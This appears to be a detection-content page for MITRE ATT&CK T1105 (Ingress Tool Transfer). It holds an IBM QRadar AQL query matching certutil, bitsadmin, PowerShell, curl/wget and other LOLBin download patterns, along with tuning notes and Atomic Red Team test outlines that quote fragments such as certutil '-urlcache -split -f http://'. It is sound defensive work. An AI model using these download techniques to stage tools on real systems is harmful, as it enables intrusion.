T1105 IBM QRadar · QRadar

Detect Ingress Tool Transfer in IBM QRadar

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools may be pulled via the C2 channel or through alternate protocols using built-in OS utilities (certutil, bitsadmin, PowerShell Invoke-WebRequest, curl, wget, scp). Threat actors including HAFNIUM, Fox Kitten, and Cobalt Group have leveraged this technique to stage second-stage payloads, implants, and post-exploitation toolkits onto victim systems.

MITRE ATT&CK

Tactic
Command and Control
Technique
T1105 Ingress Tool Transfer
Canonical reference
https://attack.mitre.org/techniques/T1105/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS EventTime,
  LOGSOURCENAME(logsourceid) AS LogSource,
  sourceip AS HostIP,
  username AS AccountName,
  "Process Name" AS ProcessName,
  "Command" AS CommandLine,
  "Target Filename" AS TargetFile,
  QIDNAME(qid) AS EventName,
  CASE
    WHEN LOWER("Process Name") LIKE '%certutil.exe%'
      AND (LOWER("Command") LIKE '%-urlcache%' OR LOWER("Command") LIKE '%-decode%' OR LOWER("Command") LIKE '%-verifyctl%')
      THEN 'certutil_download'
    WHEN LOWER("Process Name") LIKE '%bitsadmin.exe%'
      AND (LOWER("Command") LIKE '%/transfer%' OR LOWER("Command") LIKE '%/addfile%' OR LOWER("Command") LIKE '%/setnotifycmdline%')
      THEN 'bitsadmin_download'
    WHEN (LOWER("Process Name") LIKE '%powershell.exe%' OR LOWER("Process Name") LIKE '%pwsh.exe%' OR LOWER("Process Name") LIKE '%wscript.exe%' OR LOWER("Process Name") LIKE '%cscript.exe%')
      AND (LOWER("Command") LIKE '%invoke-webrequest%' OR LOWER("Command") LIKE '%net.webclient%' OR LOWER("Command") LIKE '%downloadfile%' OR LOWER("Command") LIKE '%start-bitstransfer%' OR LOWER("Command") LIKE '%httpclient%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%')
      THEN 'ps_download_cradle'
    WHEN (LOWER("Process Name") LIKE '%curl.exe%' OR LOWER("Process Name") LIKE '%wget.exe%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%')
      THEN 'curl_wget_download'
    WHEN (LOWER("Process Name") LIKE '%desktopimgdownldr.exe%' OR LOWER("Process Name") LIKE '%esentutl.exe%' OR LOWER("Process Name") LIKE '%expand.exe%' OR LOWER("Process Name") LIKE '%extrac32.exe%' OR LOWER("Process Name") LIKE '%finger.exe%' OR LOWER("Process Name") LIKE '%ftp.exe%' OR LOWER("Process Name") LIKE '%ieexec.exe%' OR LOWER("Process Name") LIKE '%mshta.exe%' OR LOWER("Process Name") LIKE '%xcopy.exe%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%' OR LOWER("Command") LIKE '%ftp://%')
      THEN 'lolbin_download'
    ELSE 'exec_dropped_temp'
  END AS DetectionType
FROM events
WHERE
  (
    (
      LOWER("Process Name") LIKE '%certutil.exe%'
      AND (LOWER("Command") LIKE '%-urlcache%' OR LOWER("Command") LIKE '%-decode%' OR LOWER("Command") LIKE '%-verifyctl%')
    )
    OR
    (
      LOWER("Process Name") LIKE '%bitsadmin.exe%'
      AND (LOWER("Command") LIKE '%/transfer%' OR LOWER("Command") LIKE '%/addfile%' OR LOWER("Command") LIKE '%/setnotifycmdline%')
    )
    OR
    (
      (LOWER("Process Name") LIKE '%powershell.exe%' OR LOWER("Process Name") LIKE '%pwsh.exe%' OR LOWER("Process Name") LIKE '%wscript.exe%' OR LOWER("Process Name") LIKE '%cscript.exe%')
      AND (LOWER("Command") LIKE '%invoke-webrequest%' OR LOWER("Command") LIKE '%net.webclient%' OR LOWER("Command") LIKE '%downloadfile%' OR LOWER("Command") LIKE '%downloaddata%' OR LOWER("Command") LIKE '%start-bitstransfer%' OR LOWER("Command") LIKE '%webclient%' OR LOWER("Command") LIKE '%httpclient%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%')
    )
    OR
    (
      (LOWER("Process Name") LIKE '%curl.exe%' OR LOWER("Process Name") LIKE '%wget.exe%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%')
    )
    OR
    (
      (LOWER("Process Name") LIKE '%desktopimgdownldr.exe%' OR LOWER("Process Name") LIKE '%esentutl.exe%' OR LOWER("Process Name") LIKE '%expand.exe%' OR LOWER("Process Name") LIKE '%extrac32.exe%' OR LOWER("Process Name") LIKE '%finger.exe%' OR LOWER("Process Name") LIKE '%ftp.exe%' OR LOWER("Process Name") LIKE '%ieexec.exe%' OR LOWER("Process Name") LIKE '%mshta.exe%' OR LOWER("Process Name") LIKE '%xcopy.exe%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%' OR LOWER("Command") LIKE '%ftp://%')
    )
    OR
    (
      (LOWER("Target Filename") LIKE '%\\temp\\%' OR LOWER("Target Filename") LIKE '%\\appdata\\%' OR LOWER("Target Filename") LIKE '%\\programdata\\%' OR LOWER("Target Filename") LIKE '%\\users\\public\\%')
      AND (LOWER("Target Filename") LIKE '%.exe' OR LOWER("Target Filename") LIKE '%.dll' OR LOWER("Target Filename") LIKE '%.ps1' OR LOWER("Target Filename") LIKE '%.vbs' OR LOWER("Target Filename") LIKE '%.bat' OR LOWER("Target Filename") LIKE '%.hta')
      AND (LOWER("Process Name") LIKE '%certutil.exe%' OR LOWER("Process Name") LIKE '%bitsadmin.exe%' OR LOWER("Process Name") LIKE '%powershell.exe%' OR LOWER("Process Name") LIKE '%curl.exe%' OR LOWER("Process Name") LIKE '%wget.exe%' OR LOWER("Process Name") LIKE '%mshta.exe%')
    )
  )
ORDER BY starttime DESC
LAST 24 HOURS
high severity medium confidence

QRadar AQL detection for T1105 Ingress Tool Transfer. Queries the events table using custom properties typically parsed by the Microsoft Windows Security DSM and Sysmon DSM. Matches LOLBin download activity, PowerShell download cradles, and executables written to suspicious temporary paths by download utilities. Requires 'Process Name', 'Command', and 'Target Filename' custom properties to be extracted from Windows Event 4688 and Sysmon EventID 1/11 log sources.

Data Sources

Microsoft Windows Security Event Log DSM (Event 4688 with process command line auditing enabled)Sysmon DSM (EventID 1 Process Create, EventID 11 File Create) via Windows Event Log forwardingWindows endpoint agents forwarding to QRadar via WinCollect or syslog

Required Tables

events (QRadar normalized event table)Custom properties: 'Process Name', 'Command', 'Target Filename' — must be defined and extracted in QRadar DSM editor for Windows and Sysmon log sources

False Positives & Tuning

  • Enterprise endpoint management platforms (Tanium, BigFix, Ansible) that use PowerShell WebClient methods to distribute software packages to managed endpoints
  • Security products performing automated threat intelligence downloads, agent self-updates, or signature refreshes via certutil or BITS — common for CrowdStrike, Carbon Black, and Symantec agents
  • Developer workstations where npm, pip, or other package managers invoke PowerShell download cradles as part of their install process, particularly on systems with restrictive execution policies that require base64-encoded commands
Download portable Sigma rule (.yml)

Other platforms for T1105

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Certutil URL Cache Download

    Expected signal: Sysmon Event ID 1: Process Create with Image=certutil.exe, CommandLine containing '-urlcache -split -f http://'. Sysmon Event ID 3: Network Connection from certutil.exe to 127.0.0.1:8080. Sysmon Event ID 11: File Create at %TEMP%\df00tech-test.exe with InitiatingProcessImage=certutil.exe. Security Event ID 4688 if command line auditing is enabled.

  2. Test 2BitsAdmin File Transfer

    Expected signal: Sysmon Event ID 1: Process Create with Image=bitsadmin.exe, CommandLine containing '/transfer' and '/download'. Sysmon Event ID 3: Network Connection from bitsadmin.exe to 127.0.0.1:8080. Microsoft-Windows-Bits-Client/Operational Event ID 3 (job created) and Event ID 59 (transfer complete) if the server responds. Sysmon Event ID 11 for file creation if download succeeds.

  3. Test 3PowerShell Invoke-WebRequest File Download

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-WebRequest' and '-OutFile'. Sysmon Event ID 3: Network Connection from powershell.exe to 127.0.0.1:8080. Sysmon Event ID 11: File Create at %TEMP%\df00tech-iwr.exe. PowerShell ScriptBlock Log Event ID 4104 with full cmdlet and parameters.

  4. Test 4Certutil Encode-then-Decode Two-Stage Transfer

    Expected signal: Two Sysmon Event ID 1 entries: first for certutil.exe -encode, second for certutil.exe -decode. Both events will have CommandLine containing 'certutil.exe' and temp path arguments. The -decode invocation is the targeted indicator. Security Event IDs 4688 for both invocations if command line auditing is enabled.

  5. Test 5Linux curl Download to /tmp

    Expected signal: Auditd syscall records for execve of curl with arguments including '-o /tmp/'. Syslog or auditd file creation record for /tmp/df00tech-test-payload. If auditd rules monitor /tmp writes (WATCH -w /tmp -p w), an auditd WATCH event fires. If endpoint agent (Falcon, Defender for Linux) is present, a process creation event with curl and -o /tmp argument is generated.

Last updated: 2026-04-17 Research depth: deep
References (11)

Unlock Pro Content

Get the full detection package for T1105 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Related Techniques

T1059.001PowerShellT1059.003Windows Command ShellT1059.004Unix ShellT1027Obfuscated Files or InformationT1140Deobfuscate/Decode Files or InformationT1197BITS JobsT1570Lateral Tool TransferT1566PhishingT1204User ExecutionT1102Web ServiceT1071.001Web ProtocolsT1608Stage Capabilities

Same Tactic: Command and Control

Popular Detections